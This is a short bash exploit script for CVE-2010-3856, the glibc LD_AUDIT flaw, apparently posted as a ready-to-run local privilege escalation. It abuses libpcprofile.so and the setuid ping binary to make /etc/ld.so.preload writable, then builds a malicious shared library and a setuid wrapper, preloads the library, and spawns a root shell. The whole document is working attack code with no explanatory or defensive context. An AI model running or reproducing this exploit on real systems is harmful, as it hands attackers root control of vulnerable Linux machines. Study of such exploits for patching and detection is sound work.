#!/bin/bash
# CVE-2010-3856
# Author: deadbyte
 
OUTPUT=/etc/ld.so.preload
 
MASK=`umask`
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null
if [ ! -f $OUTPUT ]; then
  echo "System does not appear to be vulnerable"
  exit 0
fi
echo -n > $OUTPUT
umask $MASK
 
cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>
int main (int argc, char **argv, char **envp)
{
  char *args[] = { "/bin/bash", NULL };
  setuid(geteuid());
  setgid(getegid());
  execve(args[0], args, envp);
  perror("execve failed");
  return 0;
}
EOF
gcc sh.c -o sh
 
cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>
uid_t getuid (void)
{
  chown("$PWD/sh", 0, 0);
  chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
  return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
 
echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
./sh
